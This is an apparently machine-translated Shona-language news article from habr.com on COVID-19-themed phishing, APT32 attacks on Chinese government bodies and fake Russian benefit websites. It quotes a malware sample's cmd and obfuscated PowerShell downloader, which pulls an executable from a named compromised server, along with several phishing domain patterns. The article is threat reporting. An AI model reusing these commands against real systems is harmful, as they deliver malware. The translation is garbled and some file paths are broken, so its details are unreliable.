Varwi vanoenderera mberi nekushandisa iyo COVID-19 musoro, vachigadzira kutyisidzira kwakawanda kune vashandisi vanofarira chaizvo zvese zvine chekuita nedenda. IN
Rangarira mukati
Ungade bvunzo yemahara yeCOVID-19?
Mumwe muenzaniso wakakosha weiyo coronavirus-themed phishing yaive
Kunyengetedza vashandisi vazhinji kugonesa macros kwaive zvakare nyore. Kuti uite izvi, hunyengeri hwakajairika hwakashandiswa: kuzadza rondedzero, iwe unofanirwa kutanga wagonesa macros, izvo zvinoreva kuti unofanirwa kumhanya VBA script.
Sezvauri kuona, iyo VBA script yakavharwa zvakanyanya kubva kune antiviruses.
Windows ine chekumirira chinomirira application /T <seconds> isati yagamuchira iyo yakasarudzika "Hongu" mhinduro. Kwatiri, script yakamirira 65 seconds isati yadzima mafaira enguva pfupi:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Uye ndichimirira, malware yakatorwa. Yakakosha PowerShell script yakatangwa kune izvi:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Mushure mekudhidha kukosha kweBase64, iyo PowerShell script inodhawunirodha yekuseri iri pane yakambobiwa web server kubva kuGermany:
http://automatischer-staubsauger.com/feature/777777.png
uye anorichengeta pasi pezita:
C:UsersPublictmpdirfile1.exe
forodha βC:UsersPublictmpdirβ
inodzimwa paunenge uchimhanyisa iyo 'tmps1.bat' faira rine rairo cmd /c mkdir ""C:UsersPublictmpdir"".
Targeted kurwisa masangano ehurumende
Pamusoro pezvo, vaongorori veFireEye nguva pfupi yadarika vakashuma kurwiswa kwakanangana neAPT32 kwakanangana nezvivakwa zvehurumende muWuhan, pamwe neChinese Ministry of Emergency Management. Imwe yemaRTF yakagoverwa yaive nelink yeNew York Times chinyorwa chine musoro
Sezvineiwo, panguva yekuonekwa, hapana kana maantivirus akawana chiitiko ichi, maererano neVirustotal.
Kana mawebhusaiti epamutemo ari pasi
Muenzaniso unoshamisa wekurwiswa kwe phishing wakaitika muRussia rimwe zuva. Chikonzero cheizvi chaive kugadzwa kwebhenefiti yakamirirwa kwenguva refu yevana vane makore matatu kusvika gumi nematanhatu. Pakaziviswa kutanga kwekugamuchira zvikumbiro muna Chivabvu 3, 16, mamirioni akamhanyira kuwebhusaiti yeHurumende Services kuti awane rubatsiro rwakamirirwa kwenguva refu uye akaunza pasi portal zvisina kuipa kupfuura kurwiswa kwehunyanzvi DDoS. Mutungamiriri wenyika paakati "Masevhisi eHurumende haakwanise kubata nekuyerera kwezvikumbiro," vanhu vakatanga kutaura pamhepo nezve kutangwa kweimwe saiti yekugamuchira zvikumbiro.
Dambudziko nderekuti nzvimbo dzinoverengeka dzakatanga kushanda kamwechete, uye nepo imwe, iyo chaiyo pa posobie16.gosuslugi.ru, inogamuchira zvikumbiro, zvimwe.
Shamwari dzepaSearchInform dzakawana nzvimbo dzinosvika makumi matatu dzehutsotsi mu.ru zone. Infosecurity uye Softline Kambani yakateedzera anopfuura makumi manomwe ekunyepedzera ehurumende mawebhusaiti ebasa kubva kutanga kwaKubvumbi. Vagadziri vavo vanobata zviratidzo zvinozivikanwa uye vanoshandisawo misanganiswa yemazwi gosuslugi, gosuslugi-30, vyplaty, covid-vyplaty, posobie, zvichingodaro.
Hype uye social engineering
Yese iyi mienzaniso inongosimbisa kuti vanorwisa vari kubudirira kuita mari nyaya yekoronavirus. Uye iyo yakakwira kunetsana kwevanhu uye nenyaya dzisinganyatso jeke, ndipo panowedzera mikana yevatsotsi yekuba data rakakosha, kumanikidza vanhu kuti vape mari yavo vega, kana kungobaya mamwe makomputa.
Uye nekupihwa kuti denda rakamanikidza vanhu vangangove vasina kugadzirira kuti vashande kubva kumba kwakawanda, kwete zvega, asiwo data rekambani riri panjodzi. Semuenzaniso, nguva pfupi yadarika Microsoft 365 (yaimbova Office 365) vashandisi vakaiswawo pasi pekurwiswa kwehutsotsi. Vanhu vakagamuchira mameseji ezwi makuru "akarasika" sezvinamatidzwa kumabhii. Nekudaro, iwo mafaera aive chaiwo peji reHTML rakatumira vakakuvadzwa nekurwiswa
Source: www.habr.com